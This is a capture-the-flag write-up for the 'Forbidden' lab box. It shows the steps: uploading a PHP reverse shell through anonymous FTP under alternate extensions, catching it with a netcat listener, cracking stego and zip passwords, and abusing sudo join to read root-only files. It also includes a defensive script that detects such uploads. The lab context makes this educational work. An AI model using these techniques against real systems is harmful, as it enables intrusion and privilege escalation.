
HMV-Forbidden

HMV-Forbidden box writeup

Port scanning / information gathering

┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.58.239
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-02 13:56 CST
Nmap scan report for bogon (192.168.58.239)
Host is up (0.0017s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.58.11
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 0 0 4096 Oct 09 2020 www [NSE: writeable]
80/tcp open http nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
MAC Address: 6E:0B:06:76:34:C6 (Unknown)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Unix

TRACEROUTE
HOP RTT ADDRESS
1 1.66 ms bogon (192.168.58.239)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.84 seconds

Ports 21 and 80 are open. First, check whether the FTP service allows anonymous login.

150 Here comes the directory listing.
drwxrwxrwx 2 0 0 4096 Oct 09 2020 .
drwxr-xr-x 3 0 113 4096 Oct 09 2020 ..
-rwxrwxrwx 1 0 0 241 Oct 09 2020 index.html
-rwxrwxrwx 1 0 0 75 Oct 09 2020 note.txt
-rwxrwxrwx 1 0 0 10 Oct 09 2020 robots.txt
226 Directory send OK.
ftp> cat note.txt
?Invalid command.
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||39793|)
150 Opening BINARY mode data connection for note.txt (75 bytes).
100% |***********************************************************************************************************| 75 14.41 KiB/s 00:00 ETA
226 Transfer complete.
75 bytes received in 00:00 (8.37 KiB/s)
ftp> get robots.txt
local: robots.txt remote: robots.txt
229 Entering Extended Passive Mode (|||36280|)
150 Opening BINARY mode data connection for robots.txt (10 bytes).
100% |***********************************************************************************************************| 10 6.60 KiB/s 00:00 ETA
226 Transfer complete.
10 bytes received in 00:00 (2.20 KiB/s)

After logging in, the www directory contains three files; we fetch them locally with get. A directory scan of the web server would presumably turn up the same files.

┌──(root㉿kakeru)-[~/tmp]
└─# cat note.txt
The extra-secured .jpg file contains my password but nobody can obtain it.
┌──(root㉿kakeru)-[~/tmp]
└─# cat robots.txt
/note.txt

Web enumeration

SECURE WEB/FTP
Hi, Im the best admin of the world. You cannot execute .php code on this server so you cannot obtain a reverse shell. Not sure if its misconfigured another things... but the importart is that php is disabled. -marta

The page keeps stressing that PHP is disabled, so no reverse shell can be obtained; it also leaks a username, marta.
The next step is to directory-scan the web service and look for a file with the .jpg extension.

┌──(root㉿kakeru)-[~/tmp]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u 192.168.58.239 -x jpg,php,txt,js
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.58.239
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,js,jpg
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/robots.txt (Status: 200) [Size: 10]
/note.txt (Status: 200) [Size: 75]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished

The scan shows nothing further, so the only remaining target is FTP, since the web side has no more information to give.
We used FTP to download files just now; we can also use it to upload, because the anonymous FTP root is the www directory, and its note.txt is the same file reachable over the web.
The site insists PHP cannot execute, but PHP has several other extensions, so we try them all: php3, php5, pht, phtml and phps are all extensions a PHP handler may execute.

┌──(root㉿kakeru)-[~/tmp]
└─# cp php-reverse-shell.php shell.php3

┌──(root㉿kakeru)-[~/tmp]
└─# cp php-reverse-shell.php shell.php5

┌──(root㉿kakeru)-[~/tmp]
└─# cp php-reverse-shell.php shell.phps

┌──(root㉿kakeru)-[~/tmp]
└─# cp php-reverse-shell.php shell.pht

┌──(root㉿kakeru)-[~/tmp]
└─# ftp anonymous@192.168.58.239
Connected to 192.168.58.239.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put shell.php3
local: shell.php3 remote: shell.php3
229 Entering Extended Passive Mode (|||5545|)
553 Could not create file.
ftp> ls
229 Entering Extended Passive Mode (|||36869|)
150 Here comes the directory listing.
drwxrwxrwx 2 0 0 4096 Oct 09 2020 www
226 Directory send OK.
ftp> cd www
250 Directory successfully changed.
ftp> put shell.php3
local: shell.php3 remote: shell.php3
229 Entering Extended Passive Mode (|||15003|)
150 Ok to send data.
100% |***********************************************************************************************************| 5496 30.83 MiB/s 00:00 ETA
226 Transfer complete.
5496 bytes sent in 00:00 (557.10 KiB/s)
ftp> put shell.php5
local: shell.php5 remote: shell.php5
229 Entering Extended Passive Mode (|||57590|)
150 Ok to send data.
100% |***********************************************************************************************************| 5496 30.65 MiB/s 00:00 ETA
226 Transfer complete.
5496 bytes sent in 00:00 (930.02 KiB/s)
ftp> put shell.phps
local: shell.phps remote: shell.phps
229 Entering Extended Passive Mode (|||50303|)
150 Ok to send data.
100% |***********************************************************************************************************| 5496 11.77 MiB/s 00:00 ETA
226 Transfer complete.
5496 bytes sent in 00:00 (857.65 KiB/s)
ftp> put shell.pht
local: shell.pht remote: shell.pht
229 Entering Extended Passive Mode (|||34415|)
150 Ok to send data.
100% |***********************************************************************************************************| 5496 25.44 MiB/s 00:00 ETA
226 Transfer complete.
5496 bytes sent in 00:00 (838.49 KiB/s)

Rename the PHP reverse-shell file with each extension and upload all of them to the www directory.
Testing them shows that php5 works (I had written the wrong IP in the PHP file the first time, so I renamed the file), and a shell comes back on the listener.

┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234
Linux forbidden 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
03:22:44 up 31 min, 0 users, load average: 0.35, 0.18, 0.27
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.58.239/shell1.php5
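
From the defender's side, the bypass above leaves two visible traces: PHP-family files sitting in the anonymous-writeable webroot, and served requests for non-.php variants such as .php5. The following Python script is an added example (not part of the original writeup) that flags both; the extension set, the combined-log regex, and the sample listing and log lines are assumptions constructed for illustration.

```python
import re
from pathlib import PurePosixPath

# PHP-family extensions a handler may still execute when only ".php" has been
# blocked. The set is an assumption for this example; match it to the handler
# regex actually configured on the server.
PHP_FAMILY_EXTS = {"php", "php3", "php4", "php5", "php7", "pht", "phtml", "phps", "phar"}

# Combined log format: ip ident user [time] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

def php_family_ext(path):
    """Return the lower-cased PHP-family extension of a path/URL, or None."""
    ext = PurePosixPath(path.split("?", 1)[0]).suffix.lstrip(".").lower()
    return ext if ext in PHP_FAMILY_EXTS else None

def flag_webroot_uploads(filenames):
    """Files in the anonymous-writeable webroot that an interpreter could run."""
    return sorted(f for f in filenames if php_family_ext(f))

def flag_variant_requests(log_lines):
    """Successfully served requests for non-.php PHP variants: the bypass signature."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined format, skip
        ext = php_family_ext(m["path"])
        if ext and ext != "php" and m["status"].startswith("2"):
            hits.append((m["ip"], m["path"], ext))
    return hits

# Constructed sample data: the www listing after the uploads in the writeup,
# and three made-up access-log lines (not taken from the box).
WWW_LISTING = ["index.html", "note.txt", "robots.txt",
               "shell.php3", "shell.php5", "shell.phps", "shell.pht"]
SAMPLE_LOG = [
    '192.168.58.11 - - [02/Mar/2025:03:20:01 +0000] "GET /note.txt HTTP/1.1" 200 75 "-" "gobuster/3.6"',
    '192.168.58.11 - - [02/Mar/2025:03:20:02 +0000] "GET /index.php HTTP/1.1" 403 0 "-" "gobuster/3.6"',
    '192.168.58.11 - - [02/Mar/2025:03:22:40 +0000] "GET /shell1.php5 HTTP/1.1" 200 0 "-" "curl"',
]

if __name__ == "__main__":
    print("uploads to review:", flag_webroot_uploads(WWW_LISTING))
    print("variant requests :", flag_variant_requests(SAMPLE_LOG))
```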

Privilege escalation

The www-data user has no sudo rights.
Following the hint on the web page, we need to find the .jpg file.
Once found, python3 turns out to be available on the box, so start an HTTP server with it and wget the image from the attacking machine.

www-data@forbidden:/home$ find / -name "*.jpg" -print 2>/dev/null
/var/www/html/TOPSECRETIMAGE.jpg

www-data@forbidden:~/html$ which python3
/usr/bin/python3
www-data@forbidden:~/html$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Crack the image with stegseek.

┌──(root㉿kakeru)-[~/tmp]
└─# stegseek -f TOPSECRETIMAGE.jpg -wl rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "portugal"
[i] Original filename: "pass.zip".
[i] Extracting to "TOPSECRETIMAGE.jpg.out".

┌──(root㉿kakeru)-[~/tmp]
└─# steghide extract -sf TOPSECRETIMAGE.jpg
Enter passphrase:
wrote extracted data to "pass.zip".

┌──(root㉿kakeru)-[~/tmp]
└─# unzip TOPSECRETIMAGE.jpg.out
Archive: TOPSECRETIMAGE.jpg.out
[TOPSECRETIMAGE.jpg.out] pass.txt password:
password incorrect--reenter:
password incorrect--reenter:

┌──(root㉿kakeru)-[~/tmp]
└─# unzip pass.zip
Archive: pass.zip
[pass.zip] pass.txt password:
password incorrect--reenter:
password incorrect--reenter:
skipping: pass.txt incorrect password

The recovered passphrase only extracts the zip; it is not the zip's own password. So use zip2john to convert the zip into a hash that john can crack.

┌──(root㉿kakeru)-[~/tmp]
└─# zip2john pass.zip > tmp
ver 2.0 efh 5455 efh 7875 pass.zip/pass.txt PKZIP Encr: TS_chk, cmplen=66, decmplen=71, crc=E22A2397 ts=9831 cs=9831 type=8

┌──(root㉿kakeru)-[~/tmp]
└─# john tmp
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
secret (pass.zip/pass.txt)
1g 0:00:00:00 DONE 2/3 (2025-03-02 16:34) 100.0g/s 3069Kp/s 3069Kc/s 3069KC/s 123456..ferrises
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

┌──(root㉿kakeru)-[~/tmp]
└─# unzip pass.zip
Archive: pass.zip
[pass.zip] pass.txt password:
replace pass.txt? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
inflating: pass.txt

┌──(root㉿kakeru)-[~/tmp]
└─# cat pass.txt
- .... .
.--. .- ... ... .-- --- .-. -..
.. ... ---...

vGffXfDreF453!
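
The three Morse lines at the top of pass.txt are a header, not part of the password. As an added example (not from the original writeup), this Python decoder reads the file as printed above and separates the Morse header from the literal password line; the Morse table and the embedded copy of pass.txt are constructed here for the example.

```python
import re

# International Morse table: letters, digits and a few punctuation marks
# (enough for the header in pass.txt, including "---..." for a colon).
MORSE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z",
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
    "---...": ":", "--..--": ",", ".-.-.-": ".", "..--..": "?", "-....-": "-",
}

MORSE_CHARS = set(".- /")

def decode_morse_line(line):
    """Decode one line of Morse: one space separates symbols, '/' or a run of
    three or more spaces separates words. Unknown symbols decode to '?'."""
    words = re.split(r"\s*/\s*|\s{3,}", line.strip())
    return " ".join("".join(MORSE.get(sym, "?") for sym in w.split()) for w in words)

def decode_pass_txt(text):
    """Split pass.txt into (decoded Morse header, literal remaining lines)."""
    header, literal = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if set(line) <= MORSE_CHARS:   # only dots, dashes, spaces, slashes
            header.append(decode_morse_line(line))
        else:
            literal.append(line)
    return " ".join(header), "\n".join(literal)

# Copy of pass.txt as printed in the writeup (embedded here for the example).
PASS_TXT = """- .... .
.--. .- ... ... .-- --- .-. -..
.. ... ---...

vGffXfDreF453!
"""

if __name__ == "__main__":
    header, secret = decode_pass_txt(PASS_TXT)
    print(header)   # THE PASSWORD IS:
    print(secret)   # vGffXfDreF453!
```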

┌──(root㉿kakeru)-[~/tmp]
└─# echo vGffXfDreF453 | base64 -d
¼gß]ðëx^9base64: invalid input

I tried vGffXfDreF453 as the password, but it is not any user's password.
Stuck at this point, I checked a walkthrough and found that the name of the jpg file is the password... The name is indeed odd, and in capitals too; I should have noticed that 😲

marta@forbidden:~$ sudo -l
Matching Defaults entries for marta on forbidden:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User marta may run the following commands on forbidden:
(ALL : ALL) NOPASSWD: /usr/bin/join

GTFOBins lists the privilege escalation method. The join command merges lines from two files on a common field, much like an SQL JOIN, and this can be abused to read arbitrary files.
sudo join -a 2 /dev/null $LFILE: the -a 2 option prints every line of the second file, including lines that have no match in the first file.

marta@forbidden:/home$ sudo /usr/bin/join -a 2 /dev/null /home/markos/user.txt     
HMVpussycat

marta@forbidden:~$ sudo /usr/bin/join -a 2 /dev/null /root/root.txt
HMVmymymymymind

Summary

A better understanding of FTP usage, both uploading and downloading; when the www directory is writeable, pay extra attention, since a PHP reverse shell can be uploaded there.
When .php is blocked, consider the other extensions.
Be more alert to file names, including names that look like passwords.
Learned what the join command is and how it can be abused.